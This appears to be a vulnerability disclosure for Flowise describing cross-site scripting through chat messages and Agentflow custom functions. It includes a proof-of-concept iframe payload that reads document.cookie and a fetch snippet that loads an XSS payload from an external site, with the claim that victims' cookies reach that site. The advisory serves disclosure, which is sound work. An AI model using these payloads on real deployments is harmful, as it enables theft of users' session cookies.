Summary
A XSS(cross-site scripting) vulnerability is caused by insufficient filtering of input by web applications. Attackers can leverage this XSS vulnerability to inject malicious script code (HTML code or client-side Javascript code) into web pages, and when users browse these web pages, the malicious code will be executed, and the victims may be vulnerable to various attacks such as cookie data theft, etc.
Details
- Send a Message
<iframe src="javascript:alert(document.cookie);"> from User in a chat box:
<img width="1396" alt="image" src="https://github.com/user-attachments/assets/b472e304-9e7a-40d2-8469-675a5f0744e5" />
Trigger in other ways:
-
Create a Agentflow in cloud platform (https://cloud.flowiseai.com/agentflows)
-
Create a Custom function as an example, use the below example code.
const fetch = require('node-fetch');
const url = 'https://external.website';
const options = {
method: 'GET',
headers: {
'Content-Type': 'application/json'
}
};
try {
const response = await fetch(url, options);
const text = await response.text();
return text;
} catch (error) {
console.error(error);
return '';
}
-
The external website (https://external.website) return a XSS payload as content.
<img width="1228" alt="image" src="https://github.com/user-attachments/assets/2e0a4d1c-45bf-4c5f-b1b4-54c51f35ce53" />
-
The javascript code is executed and the victim's cookie data is sent to the external website.
<img width="1212" alt="image" src="https://github.com/user-attachments/assets/4ea17dab-c456-4a51-94f4-93fe9aa18cf7" />
PoC
<iframe src="javascript:alert(document.cookie);">
Impact
it is critical XSS vulnerability. All users of Flowise platform that use the workflows of agents.
JavaScript
Miggo AI